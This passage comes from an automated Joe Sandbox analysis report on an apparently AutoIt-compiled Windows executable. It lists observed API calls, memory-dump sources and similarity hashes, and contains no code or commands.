• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
• Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
• Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
• Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 2652923123-3941886329
                                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: U$\
                                                                        • API String ID: 2666721431-100911408
                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                        • String ID: LPT
                                                                        • API String ID: 3035604524-1350329615
                                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$h
                                                                        • API String ID: 4104443479-677774858
                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID: &
                                                                        • API String ID: 2931989736-1010288
                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_wcslen
                                                                        • String ID: |
                                                                        • API String ID: 596671847-2343686810
                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
